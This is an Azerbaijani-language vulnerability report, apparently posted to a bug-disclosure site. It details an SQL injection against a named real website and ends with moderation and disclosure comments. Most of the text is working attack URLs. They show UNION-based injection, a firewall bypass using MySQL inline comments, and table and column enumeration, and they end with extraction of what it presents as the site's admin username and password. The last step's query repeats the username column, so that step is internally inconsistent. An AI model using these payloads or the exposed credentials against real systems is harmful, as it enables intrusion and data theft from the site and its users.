sidid Parametr Sql Injection

atacard.az 16 June 2016, 15:04

Detailed information

www.atacard.az/?sid=553 '
---------------------------------
Ekrana Dataların Neçənci Column-dan Gəldiyini Öyrənmək Üçün Aşağıda Olan Url Girəndə Ekranda Hansisa Rəqəm Yazılmalı İdi
http://www.atacard.az/?sid=-553%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13--+-%27
Ama Ekrana Heçnə Gəlmir Halubuki Bir Rəqəm Gəlməlidir
http://www.atacard.az/?sid=-553' UNION SELECT 11111,222222,333333,444444,5555555,6666666,7777777,8888888,999999,101010,110011,121212,131313--+-'
Url-i Belə Edərək Bu Linkə Daxil Olub Firewall-ı Keçmək Olur.Linke Daxil Olanda Ekranda Heç Bir Yazı Gəlmir Ama Səyfənin HTML (Source Kodlarına ) Baxsanız Linkdəki Bir Ədədi Görə Bilərsiniz
deyerler <div class='path'><a href='?sid='></a> &nbsp;>&nbsp; <b><a href='?sid=110011'></a></b></div></div>
<div class='path'><a href='?sid='></a> &nbsp;>&nbsp; <b><a href='?sid=Bu hissede olur '></a></b></div></div>
--------------------------------
http://www.atacard.az/?sid=-553' UNION SELECT 11111,222222,333333,444444,5555555,6666666,7777777,8888888,999999,101010,version(),121212,131313--+-'
Ekrn Deyeri
<div class='path'><a href='?sid='></a> &nbsp;>&nbsp; <b><a href='?sid=5.6.30'></a></b></div></div>
mysql versiasi
--------------------------------------
Bunnan Sonra Database-dəki Table Adlarını Çəkə Bilerik.Bunun Üçün :
http://www.atacard.az/?sid=-553' UNION SELECT 11111,222222,333333,444444,5555555,6666666,7777777,8888888,999999,101010,table_name,121212,131313 from information schema.tables where table_schema=database()--+-'
Ama Firewall Bizə 406 Not Acceptable xətası Verəcək Bunu Keçmək Üçün
http://www.atacard.az/?sid=-553' /*!UNION*/ /*!SELECT*/ 11111,222222,333333,444444,5555555,6666666,7777777,8888888,999999,101010,/*!table_name*/,121212,131313 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema=database()*/--+-'
Belə Edərək Yenə Source Kodlarda Həmin Hissəyə Baxaraq Database-ki İlk Table Adını Görə Bilərsiniz.Amma Kodlara Baxanda Həmin Hissədə 11111 Yazısı Gələcək.

<div class='path'><a href='?sid='></a> &nbsp;>&nbsp; <b><a href='?sid=11111'></a></b></div></div>

---------------------------------------------------
Bu Hadisənin Nədən Yarandığını Bilmirəm Ama Linki Bu Cürə Dəyişərək
http://www.atacard.az/?sid=-553' /*!UNION*/ /*!SELECT*/ /*!table_name*/,222222,333333,444444,5555555,6666666,7777777,8888888,999999,101010,null,121212,131313 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema=database()*/--+-'
Table Adlarına Baxmaq Olar
Ekran Deyeri
<div class='path'><a href='?sid='></a> &nbsp;>&nbsp; <b><a href='?sid=ac_me_content'></a></b></div></div>

-----------------------------
Yuxarida Göründüyü Kimi Database-ki İlk Table ac_me_content-dir
Lakin group_concat() vəya limit əmrlərindən İstifadə Edərək Database-ki Diger Table Adlarına Baxmaq Olmur, Ama Like Əmrindən İstifadə Edərək User-lər Olan Table Adını Tapmaq Mümkündür Bunun Üçün Like %user% hex-leyib :
http://www.atacard.az/?sid=-553' /*!UNION*/ /*!SELECT*/ /*!table_name*/,222222,333333,444444,5555555,6666666,7777777,8888888,999999,101010,null,121212,131313 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema=database()*/ /*!and*/ /*!table_name*/ /*!like 0x257573657225*/--+-'
Ekran Deyeri
<div class='path'><a href='?sid='></a> &nbsp;>&nbsp; <b><a href='?sid=ac_me_users'></a></b></div></div>
------------------------------------------
Source Kodlara Baxsanız Görə Biləriniz User Table-sini Onnan Sonra User Table-dən username Və password Olan Datalarını Çəkmək Lazımdır Ama Yenə group_concat Və Limit Funksiyalarından İstifadə Etmək Olmadığı Üçün Yenə Like %user% (%user% bu hissəni hex etmək lazımdır ) Edərək :
http://www.atacard.az/?sid=-553' /*!UNION*/ /*!SELECT*/ /*!column_name*/,222222,333333,444444,5555555,6666666,7777777,8888888,999999,101010,null,121212,131313 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61635f6d655f7573657273*/ /*!and*/ /*!column_name*/ /*!like 0x257573657225*/--+-'
Source Kodlara Baxaraq İstifadəçi Adları Yerləşən Column Adının : username Olduğunu Görərsiniz
Ekran Deyeri
<div class='path'><a href='?sid='></a> &nbsp;>&nbsp; <b><a href='?sid=username'></a></b></div></div>
------------------------------------
İndi Şifrələr Olan Column Adını Tapaq Bunun Üçün Like %pas%(%pas% bu hissəni hex etmək lazimdır ) Edərək :
http://www.atacard.az/?sid=-553' /*!UNION*/ /*!SELECT*/ /*!column_name*/,222222,333333,444444,5555555,6666666,7777777,8888888,999999,101010,null,121212,131313 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61635f6d655f7573657273*/ /*!and*/ /*!column_name*/ /*!like 0x2570617325*/--+-'
Source Kodlara Baxıb Şifrələr Yerləşən Column Adının : password Olduğunu Görərsiniz
Ekran Deyeri
<div class='path'><a href='?sid='></a> &nbsp;>&nbsp; <b><a href='?sid=password'></a></b></div></div>
-----------------------------------------
İstifadəçi Adı Və Şifrələr Olan Column Adlarını Bildiyiniz Üçün.Admin username Və password-a Daha Baxa Bilərik
Adminin İstifadəçi Adına :
http://www.atacard.az/?sid=-553' /*!UNION*/ /*!SELECT*/ /*!username*/,222222,333333,444444,5555555,6666666,7777777,8888888,999999,101010,null,121212,131313 /*!from*/ /*!ac_me_users*/--+-'
Source Kodlara Baxaraq Görə Biləriniz
Ekran Deyeri
<div class='path'><a href='?sid='></a> &nbsp;>&nbsp; <b><a href='?sid=atacard'></a></b></div></div>
------------------------------------
Admin İstifadəçi Şifrəsinə :
http://www.atacard.az/?sid=-553' /*!UNION*/ /*!SELECT*/ /*!username*/,222222,333333,444444,5555555,6666666,7777777,8888888,999999,101010,null,121212,131313 /*!from*/ /*!ac_me_users*/--+-'
Source Kodlara Baxaraq Görə Biləriniz
Ekran Deyeri
<div class='path'><a href='?sid='></a> &nbsp;>&nbsp; <b><a href='?sid=ata3701'></a></b></div></div>

Comments

  • 21 October 2016, 13:47
    Vulnerability status
    Have not any information from source

  • 04 October 2016, 10:04
    Added point to Vulnerability
    For translate of bug gived 10 point to translator

  • 04 October 2016, 10:04
    Added point to Vulnerability
    For translate of bug gived 1 point to translator

  • 19 August 2016, 10:08
    Vulnerability status
    Sended e-mail to source about vulnerability

  • 19 June 2016, 06:48
    Added point to Vulnerability
    Moderator gave 10 point from 10 to vulnerability

  • 19 June 2016, 06:47
    Vulnerability status
    Confirmed by Moderator

  • 17 June 2016, 15:02
    Vulnerability changed
    Vulnerability "sidid Parametr Sql Injection" changed

  • 16 June 2016, 15:04
    Vulnerability added
    Vulnerability added to BUGemot